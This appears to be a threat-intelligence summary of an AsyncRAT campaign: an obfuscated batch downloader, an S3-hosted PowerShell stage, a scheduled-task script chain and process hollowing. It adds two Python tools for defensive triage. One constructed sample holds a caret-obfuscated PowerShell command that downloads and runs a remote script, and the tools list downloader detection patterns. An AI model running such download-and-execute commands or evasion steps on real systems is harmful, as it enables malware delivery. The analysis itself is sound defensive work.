AsyncRAT: Using Fully Undetected Downloader

AsyncRAT, an open-source remote administration tool, is examined through a campaign in which attackers deliver it with a fully undetected (FUD) batch downloader that fetches a PowerShell second stage from an Amazon S3 bucket. The analysis traces the infection flow from the FUD batch downloader through a chain of dropped scripts to RunPE-based in-memory injection and encrypted C2 communications, highlighting several evasion and persistence techniques. #AsyncRAT #FUDDownloader #RunPE #ProcessHollowing

Keypoints

  • The article analyzes AsyncRAT, an open-source tool that attackers and some APT groups have used, focusing on a Fully Undetected Downloader: a Batch script that retrieves its second stage from an Amazon S3 bucket.
  • The first-stage downloader is a Batch script with zero VirusTotal detections; the single malicious command is padded with the same repeated nonsense (Japanese) string and slightly obfuscated, which is enough to evade signature-based detection.
  • The batch file downloads a second stage PowerShell script from an Amazon S3 bucket that then creates multiple files to chain execution for the final payload.
  • A chained execution flow is employed (xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1) culminating in a RunPE-based in-memory injection to run AsyncRAT without writing the main payload to disk.
  • Stage 03 performs Process Hollowing: the PowerShell script loads the RunPE assembly in memory and calls its “Execute” method with the path of the target executable and the AsyncRAT payload bytes, so the RAT runs inside a legitimate process.
  • AsyncRAT’s final stage decrypts its configuration with AES-256-CBC, supports anti-analysis checks (though disabled in the sample), and can establish persistence via registry or scheduled tasks plus C2 communication that can be sourced from Pastebin.
  • Netskope Threat Labs notes coverage for known IOCs and payloads and emphasizes caution with batch/macro-based delivery vectors, recommending training and secure gateways to mitigate such campaigns.
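
As an added example that is not part of the Netskope write-up, the Python below triages a batch downloader of the kind described: it separates the repeated nonsense comment lines from the one real command, undoes cmd.exe caret splitting, and pulls out the URL and download/execute indicators. The sample batch file, the caret obfuscation, the bucket name and the file names are constructed assumptions for this example, not the contents of the actual sample.

```python
"""Triage a padded batch downloader: separate the repeated nonsense comment lines
from the real command, undo cmd.exe caret splitting, and extract the URL and
download/execute indicators. Added example, not Netskope's tooling; SAMPLE_BAT is
constructed (the caret splitting, bucket name and file names are assumptions)."""
import re

COMMENT_RE = re.compile(r"^\s*(?:::|rem\b)\s*", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
INDICATORS = {  # indicator name -> pattern tested against the de-obfuscated line
    "powershell":    re.compile(r"\b(?:powershell|pwsh)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "downloader":    re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|"
                                r"\bcurl\b|bitsadmin|certutil", re.I),
    "s3_bucket":     re.compile(r"s3[.-][\w.-]*amazonaws\.com", re.I),
}

SAMPLE_BAT = r"""@echo off
:: これは意味のない文字列です
:: これは意味のない文字列です
rem これは意味のない文字列です
po^wer^shell -w hidden -ep bypass -c "iwr https://example-bucket.s3.amazonaws.com/stage2.ps1 -OutFile %TEMP%\xx.ps1; & %TEMP%\xx.ps1"
:: これは意味のない文字列です
:: これは意味のない文字列です
"""


def deobfuscate_carets(line):
    """Undo cmd.exe escaping: `^x` -> `x`, `^^` -> `^`. cmd.exe drops the caret
    before executing, so po^wer^shell runs as powershell while a naive string
    match for "powershell" fails."""
    out, i = [], 0
    while i < len(line):
        if line[i] == "^" and i + 1 < len(line):
            out.append(line[i + 1])
            i += 2
        else:
            out.append(line[i])
            i += 1
    return "".join(out)


def split_padding(text):
    """Return (padding strings, candidate command lines). Padding is comment
    lines (`::` or `rem`, marker stripped) and lines without any ASCII letter."""
    padding, commands = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if COMMENT_RE.match(line):
            padding.append(COMMENT_RE.sub("", line))
        elif not re.search(r"[A-Za-z]", line):
            padding.append(line)
        else:
            commands.append(deobfuscate_carets(line))
    return padding, commands


def triage(text):
    padding, commands = split_padding(text)
    report = {
        "padding_lines": len(padding),
        "distinct_padding": len(set(padding)),  # 1 => one string repeated throughout
        "commands": [], "urls": [],
    }
    for cmd in commands:
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        report["commands"].append({"command": cmd, "indicators": hits})
        report["urls"].extend(URL_RE.findall(cmd))
    report["suspicious"] = [c for c in report["commands"] if c["indicators"]]
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_BAT), indent=2, ensure_ascii=False))
```

The indicator list is deliberately applied after caret removal: matching the raw line would miss the split keyword, which is the whole point of that obfuscation. A `distinct_padding` of 1 with many padding lines reproduces the "same string repeated" pattern the write-up describes and is itself a useful hunting signal.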

MITRE Techniques

  • [T1059.003] Windows Command Shell – Batch script downloads and executes the second stage. ‘The first stage is a batch script that contains zero detections on VirusTotal.’
  • [T1059.001] PowerShell – Downloads and chains multiple files for the final payload. ‘The file downloaded from the Amazon S3 bucket is a PowerShell script. … this script creates multiple files to execute the last stage.’
  • [T1053.005] Scheduled Task – The chain includes scheduled execution of components (xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1). ‘File “xx.bat” executes file “Bin.vbs” via scheduled task.’
  • [T1055.012] Process Injection: Process Hollowing – RunPE is loaded in memory and used to inject AsyncRAT into a legitimate process. ‘The PowerShell script loads RunPE in memory and calls a method named “Execute” … the AsyncRAT bytes in the arguments.’
  • [T1027] Obfuscated Files and Information – The downloader pads the batch file with a repeated nonsense string and slightly obfuscates the malicious command. ‘The string is always the same and is in Japanese. … this string seems to be nonsense words added by the attacker.’ ‘The malicious command is quite simple and it can be found within the nonsense strings. It’s slightly obfuscated…’
  • [T1140] Deobfuscate/Decode Files or Information – AsyncRAT decrypts its configuration strings at runtime. ‘AES-256 in CBC mode to decrypt the strings.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via the registry (the scheduled-task alternative maps to T1053.005 above). ‘It’s capable of establishing persistence via registry or a scheduled task.’
  • [T1497] Virtualization/Sandbox Evasion – Anti-analysis checks for virtualized or analysis environments, present in AsyncRAT but disabled in this sample. ‘the anti-analysis feature of this sample is disabled, but AsyncRAT provides the option to detect virtualized and analysis environments…’
  • [T1573] Encrypted Channel – Encrypted communication with the C2 server, whose address and port can be fetched from Pastebin. ‘starts an encrypted communication with the C2 server.’
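
The scheduled-task hop in the chain (xx.bat registering a task that launches Bin.vbs) breaks the parent/child link a raw process tree would otherwise show, because the task is started by the Task Scheduler service rather than by the batch file. As an added example, not code from Netskope or from AsyncRAT, the Python below stitches that chain back together from process-creation events by correlating the script path named in `schtasks /create /tr` with the later script-host process, then emits the signals a responder would alert on. The events, pids, paths and schtasks arguments are constructed assumptions modelled on the described xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1 flow.

```python
"""Stitch a staged script chain back together across a scheduled-task hop from
process-creation events. Added example, not Netskope's or AsyncRAT's code: the
events are constructed to mirror the described xx.vbs -> xx.bat -> Bin.vbs ->
Bin.bat -> Bin.ps1 flow; pids, paths and schtasks arguments are assumptions."""
import re

SCRIPT_RE = re.compile(r"[A-Za-z]:\\[^\s\"']*?\.(?:vbs|bat|cmd|ps1|js)\b", re.I)
TASK_TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUNS_SCRIPTS = SCRIPT_HOSTS | {"cmd.exe", "powershell.exe", "pwsh.exe"}
T = r"C:\Users\u\AppData\Local\Temp"  # assumed drop directories
R = r"C:\Users\u\AppData\Roaming"


def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}

EVENTS = [  # constructed process-creation events (pid, ppid, image, command line)
    ev(100, 1,   "explorer.exe",   "explorer.exe"),
    ev(200, 100, "wscript.exe",    f'wscript.exe "{T}\\xx.vbs"'),
    ev(300, 200, "cmd.exe",        f'cmd.exe /c "{T}\\xx.bat"'),
    ev(400, 300, "schtasks.exe",   f'schtasks.exe /create /f /tn Bin /sc minute /mo 1 '
                                   f'/tr "wscript.exe {R}\\Bin.vbs"'),
    # The task fires under the Task Scheduler service, so the parent link back to
    # the batch file that registered it is lost in the raw process tree.
    ev(500, 1,   "svchost.exe",    "svchost.exe -k netsvcs -s Schedule"),
    ev(600, 500, "wscript.exe",    f"wscript.exe {R}\\Bin.vbs"),
    ev(700, 600, "cmd.exe",        f'cmd.exe /c "{R}\\Bin.bat"'),
    ev(800, 700, "powershell.exe", f"powershell.exe -w hidden -ep bypass -f {R}\\Bin.ps1"),
    ev(900, 100, "powershell.exe", "powershell.exe"),  # benign interactive shell
]


def image_name(e):
    return e["image"].rsplit("\\", 1)[-1].lower()


def script_of(e):
    m = SCRIPT_RE.search(e["cmdline"])
    return m.group(0) if m else None


def ancestry(by_pid, pid):
    """Root-first list of events from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def task_registrations(events):
    """Lower-cased script path named in a `schtasks /create ... /tr` -> that event."""
    regs = {}
    for e in events:
        if image_name(e) == "schtasks.exe" and "/create" in e["cmdline"].lower():
            m = TASK_TR_RE.search(e["cmdline"])
            target = SCRIPT_RE.search(m.group(1) or m.group(2)) if m else None
            if target:
                regs[target.group(0).lower()] = e
    return regs


def reconstruct_chain(events, pid, max_hops=8):
    """Ancestry of pid, stitched backwards: when the tree starts at a script host
    running a script that an earlier schtasks call registered, the registering
    process's own ancestry is prepended, with a marker where the task fired."""
    by_pid = {e["pid"]: e for e in events}
    regs = task_registrations(events)
    steps, frontier = [], ancestry(by_pid, pid)
    for _ in range(max_hops):
        hop = next((i for i, e in enumerate(frontier) if image_name(e) in SCRIPT_HOSTS
                    and (script_of(e) or "").lower() in regs), None)
        if hop is None:
            break
        steps = [{"scheduled_task": True}] + frontier[hop:] + steps
        frontier = ancestry(by_pid, regs[script_of(frontier[hop]).lower()]["pid"])
    return frontier + steps


def describe(chain):
    """One label per step: the script basename where a host runs one, else the image."""
    out = []
    for e in chain:
        if e.get("scheduled_task"):
            out.append("[scheduled task fires]")
        elif image_name(e) in RUNS_SCRIPTS and script_of(e):
            out.append(script_of(e).rsplit("\\", 1)[-1])
        else:
            out.append(image_name(e))
    return out


def indicators(chain):
    """Signals to alert on over the stitched chain."""
    hits = []
    scripts = [e for e in chain if not e.get("scheduled_task")
               and image_name(e) in RUNS_SCRIPTS and script_of(e)]
    if any(e.get("scheduled_task") for e in chain):
        hits.append("scheduled_task_hop")
    if len(scripts) >= 3:
        hits.append("long_script_chain")
    if chain and image_name(chain[-1]) in {"powershell.exe", "pwsh.exe"}:
        for name, rx in (("powershell_hidden", r"-w(?:indowstyle)?\s+hidden"),
                         ("powershell_bypass", r"-e(?:xecutionpolicy|p)\s+bypass")):
            if re.search(rx, chain[-1]["cmdline"], re.I):
                hits.append(name)
    return hits


if __name__ == "__main__":
    for pid in (800, 900):
        chain = reconstruct_chain(EVENTS, pid)
        print(pid, " -> ".join(describe(chain)), indicators(chain))
```

Without the `/tr` correlation the PowerShell process at the end of the chain only has svchost.exe as its root, which is why a rule keyed solely on parent/child relationships misses this kind of staging; correlating on the script path registered by schtasks restores the full xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1 sequence.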

Indicators of Compromise

  • [URL] Amazon S3 bucket – used to host the second-stage PowerShell payload.
  • [URL] Pastebin – used to download the C2 address and port information.
  • [File] xx.vbs, xx.bat, Bin.vbs, Bin.bat, Bin.ps1 – filenames used in the staged execution chain.

Read more: https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader